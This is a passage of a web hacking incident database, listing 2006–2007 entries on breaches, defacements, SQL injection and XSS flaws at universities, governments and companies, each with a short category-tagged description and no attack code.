Incident Description:

Approximately 1100 students and faculty members' personal information records which includes social security numbers were exposed by a vulnerable web application at the Molecular and Cellular Biology program at the University of Iowa. The report suggests that the application was actually compromised.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-24: Hackers access personal info on faculty members at Univ. of Virginia
WHID ID: 2007-24
Date Occured: 6/12/2007
Attack Method: Unknown
Application Weakness: Application Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description:

An undisclosed vulnerability in a web application at the University of Virginia allowed hackers to access names, social security numbers and birth dates of faculty members from May 2005 until April of 2007. Approximately 5700 records where stolen in 54 distinct break-ins.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-23: Office of Nation's Top Spy Inadvertently Reveals Key to Classified National Intel Budget
WHID ID: 2007-23
Date Occured: 6/12/2007
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Security & Law Enforcement
Attacked Entity Geography: USA
Incident Description:

A spreadsheet left on the web site of the US office of national intelligence includes secret information on the total budget of the US intelligence. Interestingly the not all the required information appears in the document, but combined with other pieces of information made available prior, the total number can be calculated.


This is a very interesting example of the sensitivity of partial data or small pieces of information and not just the big secrets.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-22: Hacking of CM's website: Interpol's help sought
WHID ID: 2007-22
Date Occured: 6/12/2007
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: India
Incident Description:

The web site of the chief minister of Kerala (an Indian State) was hacked and defaced. The local police has contacted the Interpol to help in finding who is behind the web site hacking.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-21: Belgian Defense Ministry site defaced by Turks
WHID ID: 2007-21
Date Occured: 5/17/2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Security & Law Enforcement
Attacked Entity Geography: Belgium
Incident Description:

The site of the Belgian Defense Ministry was defaced by Turks who protested a pro-Kurdish remarks by the Belgian government.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Turkey
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-20: Pirate Bay breach leaks database
WHID ID: 2007-20
Date Occured: 5/14/2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Internet
Attacked Entity Geography: Sweden
Incident Description:

Private Bay is a BitTorrent information exchange blog site. Hackers used an SQL Injection vulnerability in the web site to steal 1.6 million users and passwords of the site. At least the passwords where hashed, which means that the hacker would need a cracking software and only the lame passwords will be found.
This incident highlights the Web authentication problem. Just think how many of those users use the same username and password in many other sites.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-19: Hacker accessed data at University of Missouri
WHID ID: 2007-19
Date Occured: 5/9/2007
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description:

A report within the help desk system used to track the status of open service calls created a file that was a accessible to everyone. A hacker abused the problem to get information regarding 22,000 current and former students.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-18: Microsoft.com defaced
WHID ID: 2007-18
Date Occured: 5/6/2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Technology
Attacked Entity Geography: USA
Incident Description:

This incredible story from our friends at Zone-H shed light on one of those defacement attacks, which usually go unexplained. This time an infamous Saudi-Arabian hacker abused SQL injection vulnerability in Internet Explorer Administration Kit web site. And guess what type of SQL injection: A login form SQL injection!

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Saudi Arabia
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-17: Big Brother's big bother
WHID ID: 2007-17
Date Occured: 4/26/2007
Attack Method: Credential/Session Prediction
Application Weakness: Application Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field: Media
Attacked Entity Geography: Australia
Incident Description:

The site of "Big Brother", a reality show in Australia issued duplicate session IDs to different users since the session ID pool was exhausted. Naturally, the 2nd person to get the same session ID got to see all the details of the 1st one!

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-16: USDA admits data breach, thousands of social security numbers revealed
WHID ID: 2007-16
Date Occured: 4/23/2007
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description:

Details about 63,000 loans granted to farmers by USDA (The US department of agriculture) where posted online by mistake.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-15: High School Hackers Cancel School With Fake Snow Day
WHID ID: 2007-15
Date Occured: 4/5/2007
Attack Method: Brute Force
Application Weakness: Insufficient Authentication
Outcome: Disinformation
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description:

Two girls modified a schools home page by adding a note that school was closed due to a snow storm. The attack was probably done using a rouge admin accounts.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-14: Your Free MacWorld Expo Platinum Pass
WHID ID: 2007-14
Date Occured: 4/2/2007
Attack Method: Credential/Session Prediction
Application Weakness: Application Misconfiguration
Outcome: Loss of Sales
Attacked Entity Field: Technology
Attacked Entity Geography: USA
Incident Description:

A priority code, used to get free platinum pass to MacWorld Expo, was validated on the client and enabled anyone get the pass for free. While "grutz" informed the organizers about it, when going over their log files they found out that others abused the vulnerability without letting anyone know about it.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-13: Hackers hit Georgia Tech and steal personal info
WHID ID: 2007-13
Date Occured: 4/2/2007
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description:

The personal information of about 3,000 current and former Georgia Tech employees may have been compromised. The informatoin included names, addresses, Social Security numbers and other sensitive information, including about 400 state purchasing card numbers.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-12: SQL injection at knorr.de login page
WHID ID: 2007-12
Date Occured: 4/2/2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Retail
Attacked Entity Geography: Germany
Incident Description:

While vulnerabilities in public web sites are dime a dozen this days and rarely included in WHID, a classic SQL injection in the login form on the home page of the web site of a very big company is worth an entry. In my presentation I usually claim that such vulnerabilities have disappeared years ago and then go on to show advanced SQL injection techniques. It seems that they exit.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-11: Nokia defaced by XSS
WHID ID: 2007-11
Date Occured: 3/30/2007
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Technology
Attacked Entity Geography: Canada
Incident Description:

Nokia's Canadian Web Site was defaced using an XSS attack.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-10: Super Bowl Site Hacked with Trojan, Key logger
WHID ID: 2007-10
Date Occured: 3/30/2007
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Sports
Attacked Entity Geography: USA
Incident Description:

Hackers penetrated the Dolphins stadium web site just days before the Super Bowl was held there and modified the home page to include a Trojan inflecting script.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-09: Former Fruit of the Loom workers' identities compromised
WHID ID: 2007-09
Date Occured: 3/29/2007
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description:

Names and social security numbers of former employees of Fruit of the Loom where available for download from the company's web site.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-08: WordPress Backdoor
WHID ID: 2007-08
Date Occured: 3/29/2007
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Planting of Malware
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Backdoor was planted in a new official release of WordPress, the most popular blogging software in the world. It was available for download for a few days before the backdoor was located.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: WordPress
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-07: Westerly Hospital data breach affects 2,000
WHID ID: 2007-07
Date Occured: 3/29/2007
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Health
Attacked Entity Geography: USA
Incident Description:

Personal information about 2,000 patients was mistakenly published on the hospital's web site. The leakage was discovered only when a patient found her information when "Googling" herself.


The information included personal data such as social security numbers, birth dates, address, phone number, insurance numbers and in some cases the reason for the visit.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-06: Hackers swipe seed company's customers' data
WHID ID: 2007-06
Date Occured: 3/29/2007
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Monetary Loss
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description:

11,500 credit card numbers have been stolen from the web site of Johnny's Selected Seeds a small ($13M in revenue per annum) on line vendor of seeds in Main. 20 of these are known to have been abused. As usual, the hack was discovered because of fraudulent use of stolen credit cards rather than security measures used protect the web site.


The direct cost of the breach, informing customers, researching the incident and upgrading the protection of the web site cost the company tens of thousands of dollars.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-05: Hacking John McCain
WHID ID: 2007-05
Date Occured: 3/29/2007
Attack Method: Misconfiguration
Application Weakness: Application Misconfiguration
Outcome: Defacement
Attacked Entity Field: Politics
Attacked Entity Geography: USA
Incident Description:

An open source developer virtually defaced John McCain's MySpace page. He did not have to commit any crime, because the page pulled an image directly from the open source developer's site.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-04: College glitch avails student information to public
WHID ID: 2007-04
Date Occured: 3/27/2007
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description:

A student at a community college in Sacramento who was "Googling" himself last month found his name, among 2000 others, in a file accidentally left by school staff online and picked by Google crawler.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-03: UI put staff data on Web
WHID ID: 2007-03
Date Occured: 3/26/2007
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description:

Personal information for about 2,700 University of Idaho employees was inadvertently posted at the school's Web site for 19 days in February, though officials say it was not easy to access and there's no reason yet to believe it was misused.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-01: Credit Card Information stolen from Indiana's Web Site
WHID ID: 2007-01
Date Occured: 3/26/2007
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description:

On January 3, a hacker broke into Indiana's government web site and made off with personal information for 71,000 health care aides who obtained certifications from the state, as well as 5,600 credit card numbers from people who had paid the state through the IN.gov web site.

While officials in Indiana tried to write it off as a harmless prank played by a teenager, the U.S. Department of Justice has also been investigating the case, and they believe the same hacker is responsible for attempts on other state government web sites.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-48: SQL Injection Used to Steal Information from "Life is Good"
WHID ID: 2006-48
Date Occured: 1/19/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Credit Card Leakage
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description:

Update (Jan 26th 2009) - an SC magazine article sheds more light on the incident revealing that there was actually a breach, apparently using SQL injection, which resulted in leakage of 10,000 credit card numbers


An SQL injection vulnerability that could result in a hacker being able to access credit card numbers, expiration dates, and security codes of thousands of consumers was discovered in the web site of retailer "life is good".

The US Federal Trade Commission charged "life is good" with lack of reasonable and appropriate security for the sensitive consumer information stored on its servers. The company's settlement with the company requires the company to accept a very comprehensive and costly security procedure going forward.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-47: Santa brought to Zone-H a brand new defacement
WHID ID: 2006-47
Date Occured: 4/2/2007
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Zone-h is one of the best (well, the best, not just one of them) web sites to follow if you interested in what the bad guys do. Their account of how their own web site was defaced is a classic. And no, it was not their fault. The incident shows how a seemingly minor vulnerability in a major web site (a hotmail XSS bug), can be used to deface another, unrelated site in a very elaborate and targeted attack.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-46: Hacker Redirects Bank Customers To Phony Site
WHID ID: 2006-46
Date Occured: 3/30/2007
Attack Method: Redirection
Application Weakness: Improper Input Handling
Outcome: Phishing
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A small credit union web site was hacked and the traffic redirected to a pharming site. About 180 users where redirected, out of which 12 where tricked into providing their personal information to the attackers. $500 are known to have been stolen from one of the victims.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-45: Man arrested for hacking Internet shopping malls
WHID ID: 2006-45
Date Occured: 3/30/2007
Attack Method: Hidden Parameter Manipulation
Application Weakness: Insufficient Process Validation
Outcome: Monetary Loss
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A Korean shopping system was vulnerable to hidden field manipulation and a determined hacker purchased $6000 worth of merchandize at 45 stores for much less.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-42: Netscape.com hacked
WHID ID: 2006-42
Date Occured: 7/27/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Most XSS vulnerabilities are benign. In many cases they are hardly exploitable. In this case Netscape's new digg like shared news site was hacked using a persistent XSS attack, so every viewer of the site was attacked, luckily only to show funny dialog boxes.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-41: Making money with MySpace bulletin system!
WHID ID: 2006-41
Date Occured: 7/24/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Abuse of Functionality
Outcome: Worm
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A bug in MySpace allowed a single click on an incoming bulletin by a person to forward it to all his contacts, making spreading a worm (or any content for that matter) too easy.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-40: Data Mining MySpace Bulletins
WHID ID: 2006-40
Date Occured: 7/24/2006
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

MySpace bulletins, presumably accessible only to the social network of the originator can be access by anyone by iterating through a message id query parameter.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-39: Another Google XSS
WHID ID: 2006-39
Date Occured: 7/24/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

An XSS vulnerability in the feature allowing adding an arbitrary RSS to personal web pages. Since this page resides on the main www.google.com host, the executed JavaScript can access any Google resource.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-38: Convenience or just bad design?
WHID ID: 2006-38
Date Occured: 7/24/2006
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Altiris seems to have designed their servers so that it is easy to both access their customers upload as well as find out their e-mail addresses.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-37: MySpace Hack Spreading
WHID ID: 2006-37
Date Occured: 7/24/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Worm
Attacked Entity Field: Web 2.0
Attacked Entity Geography:
Incident Description:

MySpace seems to be a heaven for XSS worms. This one seems to be even more interesting as it uses JavaScript embedded in a flash file. It is also interesting as it seems to combine the popular political defacement trend with high level application layer exploit.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-36: PayPal Flaw Gets Accidental Two-Year Reprieve?
WHID ID: 2006-36
Date Occured: 7/24/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Phishing
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

While XSS vulnerabilities in public web sites are found daily, this one is of special interest. It was found in one of the sites most targeted by Phishers, it is exploitable for Phishing and was exploited. On top of that, it seems to have been discovered and reported to PayPal already two years ago but ignored due to a communication failure.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-35: Yahoo mail XSS in CSS expression keyword
WHID ID: 2006-35
Date Occured: 5/9/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Yahoo mail does not filter properly the CSS "expression" keyword when it includes a comment that is encoded.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-34: XSS Exploit at sms.ac
WHID ID: 2006-34
Date Occured: 5/9/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

This community site allows including scripts in multiple locations including ones personal profile thus enabling XSS.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-33: Alexadex.com players.py XSS Exploit
WHID ID: 2006-33
Date Occured: 5/9/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Alexadex is an online investment game. There is an XSS vulnerability in the group adding functionality.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-32: libero.it XSS vulnerability - HTML injection
WHID ID: 2006-32
Date Occured: 5/9/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Libero.it is a Web portal of big Italian ISP offering dial-up, Broadband and talk services. A script on it's customer service pages which enabled a connection speed test is vulnerable to XSS.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-31: URL Bug On 1ASPHost and DomainDLX Hosting Services
WHID ID: 2006-31
Date Occured: 5/9/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A researcher found that the login error page on this sites can be injected.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-30: National Secret Agency of Slovak Republic Hacked
WHID ID: 2006-30
Date Occured: 4/30/2006
Attack Method: OS Commanding
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A hacker successfully abuse a vulnerability in Horde to penetrate a site owned by the National Security Agency of the Slovak Republic

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-28: Tlen.PL e-mail XSS vulnerability
WHID ID: 2006-28
Date Occured: 4/20/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Tlen.PL is a popular Polish IM system provided by o2.pl, which includes e-mail accounts. The e-mail client is web based with a browser embedded in the communicator software. Certain webmail servers do not validate e-mail subject for HTML tags, allowing attacker to inject script code.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-27: SQL Injection in incredibleindia.org
WHID ID: 2006-27
Date Occured: 4/20/2006
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

www.incredibleindia.org is official Indian government tourism website.


The researcher has found that the parameter PageID in the page ms_Page.asp is vulnerable to SQL injection. He further tested that SQL error messages enable standard probing methods for finding out the number of columns and their type work.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-26: Yahoo XSS used for phishing
WHID ID: 2006-26
Date Occured: 4/18/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Phishing
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

An XSS vulnerability in Yahoo Mail is actively exploited for targeted phishing.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-25: Everyone.net XSS
WHID ID: 2006-25
Date Occured: 4/12/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Everyone.net login script (loginuser.pl) is prone to a cross site scripting attack in the variable loginName.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-24: Hotmail XSS (2)
WHID ID: 2006-24
Date Occured: 4/12/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

The $a variable in Hotmail's inbox is vulnerable to cross site scripting vulnerability. Exploit requires the victim to open the email message.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-23: ICQ search vulnerable to XSS
WHID ID: 2006-23
Date Occured: 4/12/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

ICQ.com search script (search_result.php) is vulnerable to cross-site scripting attacks. This problem is due to a failure
in the application to properly sanitize user input, the input can be passed to the vulnerable script in 2 variables
(gender and home_country_code).

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-22: SQL injection in a banking application
WHID ID: 2006-22
Date Occured: 4/12/2006
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A CIO of a bank in Singapore reports that many application layer vulnerabilities, including SQL injection, where discovered in a banking application they purchased before it was put into production.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-21: Sourceforge.net XSS (1)
WHID ID: 2006-21
Date Occured: 4/12/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Sourceforge download pages are vulnerable to XSS

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-20: Sourceforge.net XSS (2)
WHID ID: 2006-20
Date Occured: 4/10/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Sourceforge forums search is vulnerable to XSS

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-19: Google XSS
WHID ID: 2006-19
Date Occured: 4/10/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Yet another Google XSS. This time it seems to hit Arabic variant of the main search site. It seems that the actual language selector parameter enables the attack.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-18: Myspace.com - Intricate Script Injection Vulnerability
WHID ID: 2006-18
Date Occured: 4/10/2006
